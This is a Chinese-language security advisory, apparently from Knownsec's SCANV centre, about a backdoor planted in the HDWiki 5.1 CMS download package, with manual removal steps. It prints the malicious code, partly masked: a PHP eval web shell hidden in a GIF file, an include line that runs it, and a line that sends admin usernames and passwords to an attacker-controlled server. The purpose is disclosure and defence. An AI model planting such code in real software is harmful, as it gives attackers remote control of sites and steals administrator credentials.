近日，知道創(chuàng)宇旗下SCANV網(wǎng)站安全中心研究人員發(fā)現(xiàn)HDWiki百科建站系統(tǒng)(kaiyuan.hudong.com)“HDWiki5.1正式版”被“駭客”人為植入惡意網(wǎng)站木馬(后門)代碼。

該代碼在站長用戶下載安裝HDWiki程序后，可以記錄并發(fā)送管理員密碼到“駭客”控制的服務(wù)器上，并通過該惡意代碼直接控制該站長用戶的網(wǎng)站系統(tǒng)，實現(xiàn)“脫庫”、“掛馬”及“非法SEO”等攻擊。

后門文件分析

經(jīng)過SCANV網(wǎng)站安全中心研究人員分析，“駭客”在HDWiki安裝文件包里，對三個文件進行篡改，來實現(xiàn)“遠程執(zhí)行惡意命令，記錄管理員帳號密碼”的目的。這3個文件為：

/api/uc_client/control/mail.php

/style/default/admin/open.gif

/control/admin_main.php

1、遠程執(zhí)行惡意命令

通過前兩個文件的篡改，駭客可獲得“遠程執(zhí)行惡意命令“權(quán)限，可以直接導(dǎo)致攻擊者控制網(wǎng)站系統(tǒng)。其中/style/default/admin/open.gif被植入代碼：

<?php@eval($_POST[馬賽克])?>

這是“駭客”經(jīng)常使用到的一句話網(wǎng)站木馬代碼，惡意代碼是放在gif圖片內(nèi)，直接訪問無法解析為PHP代碼執(zhí)行，然后“駭客”通過篡改/api/uc_client/control/mail.php文件的第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

包含了這個含有后門代碼的圖片，這就使圖片中的代碼得以執(zhí)行。

2、記錄管理員帳號密碼

“駭客”通過篡改文件3來實現(xiàn)“記錄管理員帳號密碼”的目的，被植入代碼位于/control/admin_main.php文件的第70行，代碼如下：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

實現(xiàn)把用戶提交的username以及password截獲等信息并發(fā)送到一個被“駭客”控制遠程的服務(wù)器。

知道創(chuàng)宇在第一時間通知了HDWiki官方，但截至到本文發(fā)布為止，官方?jīng)]有做出任何積極回應(yīng)及防御措施。

知道創(chuàng)宇安全研究團隊強烈建議站長朋友，在官方清理惡意代碼之前，暫停下載安裝HDWiki百科建站系統(tǒng)。

對于已經(jīng)安裝的站長朋友，

知道創(chuàng)宇已經(jīng)緊急推出了診斷工具(http://www.scanv.com/tools/)進行網(wǎng)站體檢，確保網(wǎng)站安全。詳細分析及解決方案見下：

第一步：通過SCANV網(wǎng)站安全中心后門檢測工具：http://www.scanv.com/tools/進行確認(rèn)是否受該后門影響。

第二步：手動清除惡意代碼

[1]將/api/uc_client/control/mail.php文件里刪除第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

復(fù)制代碼

[2]通過復(fù)制文件/style/default/open.gif覆蓋/style/default/admin/open.gif

[3]將/control/admin_main.php文件里的刪除第70行代碼：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].

'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

第三步：再次通過SCANV網(wǎng)站安全中心后門檢測工具：http://www.scanv.com/tools/體檢確認(rèn)。

第四步：登陸網(wǎng)站后臺，修改管理員密碼。

[注：請務(wù)必修改管理員密碼，另外處于安全考慮，我們把“駭客”使用的代碼部分用“馬賽克”字樣替換了，請修改代碼的時候注意一下。]

關(guān)于SCANV網(wǎng)站安全中心及知道創(chuàng)宇

“SCANV網(wǎng)站安全中心”由知道創(chuàng)宇安全研究團隊驅(qū)動,專注網(wǎng)站安全一體化解決方案,給站長朋友們提供網(wǎng)站漏洞診斷、漏洞預(yù)警、被黑預(yù)警,并提供多維度的安全解決方案、專家一對一漏洞修復(fù)、一鍵云端防御等。

“知道創(chuàng)宇”全稱為北京知道創(chuàng)宇信息技術(shù)有限公司。是國內(nèi)最早提出網(wǎng)站安全云監(jiān)測及云防御的高新企業(yè),始終致力于為客戶提供基于云技術(shù)支撐的下一代Web安全解決方案。知道創(chuàng)宇總部設(shè)在北京,在香港、上海、廣州、成都設(shè)有分公司,客戶及合作伙伴來自中國、美國、日本、韓國等。